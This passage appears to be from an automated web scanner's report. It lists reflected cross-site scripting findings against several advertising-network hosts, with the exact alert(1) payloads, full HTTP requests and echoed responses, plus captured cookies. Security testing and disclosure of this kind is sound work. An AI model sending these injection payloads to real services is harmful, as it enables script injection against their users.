User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjI=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 22-Jun-2012 13:45:56 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Sun, 20-Jun-2021 13:45:56 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); v
...[SNIP]...
f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1sc47e5"-alert(1)-"5212b298428&tp=457598401&ck="; var base_url = "http://rtb.steelhousemedia.com/capsNotify?aid=9297&cid=906&pp=2.25&guid=d09b7564-e06a-439f-88f1-23754bc64beb"; var secure_url = "https://rtb.steelhousemedia.com/caps
...[SNIP]...

3.25. http://delivery.steelhousemedia.com/serve [sh_rid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://delivery.steelhousemedia.com
Path:	/serve

Issue detail

The value of the sh_rid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 396b0"-alert(1)-"f15d9edafe5 was submitted in the sh_rid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve?cb=457598401&sh_rid=adserver005:937789396b0"-alert(1)-"f15d9edafe5&ms=1&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjI=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 22-Jun-2012 13:45:36 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Sun, 20-Jun-2021 13:45:36 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); var originalRequestURL = "delivery.steelhousemedia.com/serve?cb=457598401&sh_rid=adserver005:937789396b0"-alert(1)-"f15d9edafe5&ms=1&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1a
...[SNIP]...

3.26. http://ib.adnxs.com/ab [ccd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The value of the ccd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f20da'-alert(1)-'88f96faf74d was submitted in the ccd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ab?enc=lC2SdqOvB0CULZJ2o68HQAAAAAAAAAhAlC2SdqOvB0CVLZJ2o68HQASgEsiy1kYb_ayDGovBdy8jSwNOAAAAAFowAAC1AAAANQEAAAIAAABsowUA0WMAAAEAAABVU0QAVVNEACwB-gDcAE0AiBABAgUCAQQAAAAAvx4LvQAAAAA.&tt_code=vert-343&udj=uf%28%27a%27%2C+15288%2C+1308838692%29%3Buf%28%27r%27%2C+369516%2C+1308838692%29%3Bppv%2811776%2C+%271965494350742986756%27%2C+1308838692%2C+1311430692%2C+62058%2C+25553%29%3B&cnd=!MiWOwAjq5AMQ7MYWGAAg0ccBMAA43AFAAEi1AlAAWABgVWgAcBp45OMBgAG2AYgB6kSQAQGYAQGgAQGoAQOwAQG5AcrmMqCjrwdAwQHK5jKgo68HQMkBDYnuKtqU7z_QAQDZAQAAAAAAAPA_4AEA&ccd=!gwXrLgjq5AMQ7MYWGNHHASAAf20da'-alert(1)-'88f96faf74d&referrer=http://www.sqlmag.com/categories/category/t-sql-powershell-scripting&pp=TgNLIwAMRXwK7FqhSgx7WGgyMGjGr-K8n9EYZg&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB7-rWI0sDTvyKMaG1sQfY9rHQBO_675oCp439xBrj246PDAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi0wMDgzMDMzNDgyMjM1MDcxsgEOd3d3LnNxbG1hZy5jb226AQozMDB4MjUwX2FzyAEJ2gFEaHR0cDovL3d3dy5zcWxtYWcuY29tL2NhdGVnb3JpZXMvY2F0ZWdvcnkvdC1zcWwtcG93ZXJzaGVsbC1zY3JpcHRpbmeYAvYTwAIEyAKrgqUOqAMB6APXAugD3AX1AwIAAESABq6xlomLuorgeQ%26num%3D1%26sig%3DAGiWqtysFd00odSGYkWsoHD3rfwjq1M7dQ%26client%3Dca-pub-0083033482235071%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0083033482235071&output=html&h=250&slotname=2791141801&w=300&lmt=1308856691&channel=ca-penton_js&ad_type=Google%20Links&color_link=%232d6a98&color_text=%23000000&color_url=%232d6a98&flash=10.3.181&url=http%3A%2F%2Fwww.sqlmag.com%2Fcategories%2Fcategory%2Ft-sql-powershell-scripting&dt=1308838691808&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308838691823&frm=4&adk=190405238&ga_vid=1181228728.1308836680&ga_sid=1308838668&ga_hid=1701678051&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&ref=http%3A%2F%2Fwww.sqlmag.com%2Farticle%2Fsql-server%2Fhardening%2520sql%2520server-135858&fu=0&ifi=1&dtd=32&xpc=6vRjOQpsSA&p=http%3A//www.sqlmag.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=OZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A2%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A2%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1; icu=ChIImdYCEAoYAiACKAIw2_f97wQQ2_f97wQYAQ..; uuid2=3420415245200633085; anj=Kfw)(BE0w%(?P6JADAX?9v!$i@!bvm^WJ2Xe97*l`7e:q1uf<3Y8C?.@r]xH*dk:MB/hiH^VhWgXZ^/W`=h_NVb'qg_*RPJ>saG/)xWy9tmAE>WZ?iwp.EyEtCZ/iQ+w/H!$qbd`tXr^jSzT/[j.OJti:D(Elk1N(u(YW3/7w^`cs6R?FZ=*tbD.YJ=`=@PwrG^a9sed:h:3RiF%6-#j8?%Swn5'g2>JZ!RFFtEOw4E(M0:aQNfLxLJfYlX9d6Nqc<meGol_`jrmUb8=bkyn71d>O#H23%Zm(G1UHv2^(H0JD2mK#x0gVu^MFoH-q$feA8S'r>/Hc%ri!yDiIlo$Cla7W`J]V/+<FT@e`tO)3rp[nhl0^Q^tKMfVIw/B3]X5K=U8guwx)_$aeL(#MOCL0+-Sg-ZX!Q(6QIg9s?q`f`9HP[GG$!)N(vnkvrdxMwd'W21e2jFQ^=2Jbns*JRNcZg$!0dXd'SV$`_RK1m+gv@7r)Ly.fog>wrj.E7fysll'oxtOV*2GC0A2EUu6r(X0+G!bi)cD5Rb5gtcv')0:(=cKM21hhWWjwh4kzQPFpwqW#><@=KpSs9eh]QaA[$@H`QP8)BJ5nfz(]<!xQ%`N:re5$sSH]J`ckCVgvt?BRGTv-W<[f606(Xf:]D.[+!FUJs9[dwmU4_cH!`>uEg3s

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 24-Jun-2011 14:19:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Wed, 21-Sep-2011 14:19:25 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: anj=Kfw)(>Mwz%)_`z[:mPKd<7=nqDc+`//:U50e293-Kz>?9QDV::r>Q*pjBCL[#D6X7kL*`yn$9pmGg(Ia9kM%1ZsJJ6-DlTXCurMu^Qaa+cRkset9O99VxIrQ-Ks_SLTx(.J*bmlp984Bne0$n'j>y)eR)clD^xhsm37e)_E:<)HczGF1]Q.mpSas0svgG3(L$8pRcmy$`'bJ!6^qTdtf9$7v53xgP7X2_Y93Rswp>5*Zf6gRLLoga`]OO>qerGoCTdIO6'ozan-S9NNx4ke#b(P:mhK.6679r$b?S=WFFK9Nx:d00m'/'B1t%$w0UP?^vO^_fgN#-`@$b/Zk*Xzo3f!F6'9w1otH)ZY7uy(3p(I-a=Y9UZ%4<Krwx2fs'kTVc33sZ#YWoRal)qVP(c%#Cx7G-!qWL5VQUn0@=1#gv3@61bcW(**/3_[`JU2?51u68MA$>Z+X`WwEGd?)%Q9+!3-%e_>V]7buLolsqjbVa28EI:Kw77ow#5JA#`OaaU>U]b%n]kSwZw.[p.o)ABl:NB-1G2*VWkq6TL>BCTFe*SzG76[lme!.bcBV)LnZXVNJP2/:U9WP6tCCjcnD7^-TT9eYw17_WX$]NHk@@TUp5Rj2qi(M-C5dlS+bjaS<aeoZ!f^tj5C6c[; path=/; expires=Wed, 21-Sep-2011 14:19:25 GMT; domain=.adnxs.com; HttpOnly
Date: Thu, 23 Jun 2011 14:19:25 GMT
Content-Length: 1050

document.write('<a href="http://ib.adnxs.com/click?ZmZmZmZmBEBmZmZmZmYEQAAAAAAAAAhAlC2SdqOvB0CVLZJ2o68HQASgEsiy1kYb_ayDGovBdy8jSwNOAAAAAFowAAC1AAAANQEAAAIAAABsowUA0WMAAAEAAABVU0QAVVNEACwB-gDcAE0AiBABAgUCAQQAAAAASx1fDgAAAAA./cnd=!gwXrLgjq5AMQ7MYWGNHHASAAf20da'-alert(1)-'88f96faf74d/referrer=http%3A%2F%2Fwww.sqlmag.com%2Fcategories%2Fcategory%2Ft-sql-powershell-scripting/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB7-rWI0sDTvyKMaG1sQfY9rHQBO_675oCp439xB
...[SNIP]...

3.27. http://img.mediaplex.com/content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcaea'%3balert(1)//2fbdf1330af was submitted in the mpck parameter. This input was echoed as dcaea';alert(1)//2fbdf1330af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-130144-34236-2%3Fmpt%3D7340781dcaea'%3balert(1)//2fbdf1330af&mpt=7340781&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b2f/3/0/%2a/s%3B242475023%3B0-0%3B0%3B62427920%3B1412-640/480%3B42616718/42634505/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.sqlmag.com/article/sql-server/hardening%20sql%20server-135858
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=15017:34236/5712:3840/16228:26209/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:46:12 GMT
Server: Apache
Last-Modified: Fri, 10 Jun 2011 21:24:30 GMT
ETag: "704c39-fa5-4a56231ef7f80"
Accept-Ranges: bytes
Content-Length: 4825
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://ad.doubleclick.net/click;h=v8/3b2f/3/0/*/s;242475023;0-0;0;62427920;1412-640/480;42616718/42634505/1;;~sscs=?http://altfarm.mediaplex.com/ad/ck/15017-130144-34236-2?mpt=7340781dcaea';alert(1)//2fbdf1330af" target="_blank">
...[SNIP]...

3.28. http://img.mediaplex.com/content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83ded"-alert(1)-"82d9061212f was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-130144-34236-2%3Fmpt%3D734078183ded"-alert(1)-"82d9061212f&mpt=7340781&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b2f/3/0/%2a/s%3B242475023%3B0-0%3B0%3B62427920%3B1412-640/480%3B42616718/42634505/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.sqlmag.com/article/sql-server/hardening%20sql%20server-135858
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=15017:34236/5712:3840/16228:26209/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:46:10 GMT
Server: Apache
Last-Modified: Fri, 10 Jun 2011 21:24:30 GMT
ETag: "704c39-fa5-4a56231ef7f80"
Accept-Ranges: bytes
Content-Length: 4819
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F15017-130144-34236-2%3Fmpt%3D734078183ded"-alert(1)-"82d9061212f");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F15017-130144-34236-2%3Fmpt%3D734078183ded"-alert(1)-"82d9061212f");
mpck = "h
...[SNIP]...

3.29. http://img.mediaplex.com/content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18c26'%3balert(1)//757995cd14f was submitted in the mpvc parameter. This input was echoed as 18c26';alert(1)//757995cd14f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-130144-34236-2%3Fmpt%3D7340781&mpt=7340781&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b2f/3/0/%2a/s%3B242475023%3B0-0%3B0%3B62427920%3B1412-640/480%3B42616718/42634505/1%3B%3B%7Esscs%3D%3f18c26'%3balert(1)//757995cd14f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.sqlmag.com/article/sql-server/hardening%20sql%20server-135858
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=15017:34236/5712:3840/16228:26209/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:46:37 GMT
Server: Apache
Last-Modified: Fri, 10 Jun 2011 21:24:30 GMT
ETag: "704c39-fa5-4a56231ef7f80"
Accept-Ranges: bytes
Content-Length: 4821
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://ad.doubleclick.net/click;h=v8/3b2f/3/0/*/s;242475023;0-0;0;62427920;1412-640/480;42616718/42634505/1;;~sscs=?18c26';alert(1)//757995cd14fhttp://altfarm.mediaplex.com/ad/ck/15017-130144-34236-2?mpt=7340781" target="_blank">
...[SNIP]...

3.30. http://img.mediaplex.com/content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f20bc"%3balert(1)//d90cdb481ee was submitted in the mpvc parameter. This input was echoed as f20bc";alert(1)//d90cdb481ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-130144-34236-2%3Fmpt%3D7340781&mpt=7340781&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b2f/3/0/%2a/s%3B242475023%3B0-0%3B0%3B62427920%3B1412-640/480%3B42616718/42634505/1%3B%3B%7Esscs%3D%3ff20bc"%3balert(1)//d90cdb481ee HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.sqlmag.com/article/sql-server/hardening%20sql%20server-135858
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; __utmz=183366586.1308659533.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.547147232.1308659533.1308659533.1308659533.1; mojo2=5712:3840/14302:16279/13198:5934; mojo3=15017:34236/5712:3840/16228:26209/12309:18918/14302:2056/9608:2042/17985:6712/17038:5934/12760:2414/9966:1105/17550:1884/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:46:35 GMT
Server: Apache
Last-Modified: Fri, 10 Jun 2011 21:24:30 GMT
ETag: "704c39-fa5-4a56231ef7f80"
Accept-Ranges: bytes
Content-Length: 4821
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b2f/3/0/*/s;242475023;0-0;0;62427920;1412-640/480;42616718/42634505/1;;~sscs=?f20bc";alert(1)//d90cdb481ee");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b2f/3/0/*/s;242475023;0-0;0;62427920;1412-640/480;42616718/42634505/1;;~sscs=?f20bc";
...[SNIP]...

3.31. http://js.revsci.net/gateway/gw.js [bpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The value of the bpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0836'%3balert(1)//af4986e48da was submitted in the bpid parameter. This input was echoed as b0836';alert(1)//af4986e48da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /gateway/gw.js?csid=G07610&bpid=S0244b0836'%3balert(1)//af4986e48da HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.viti.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
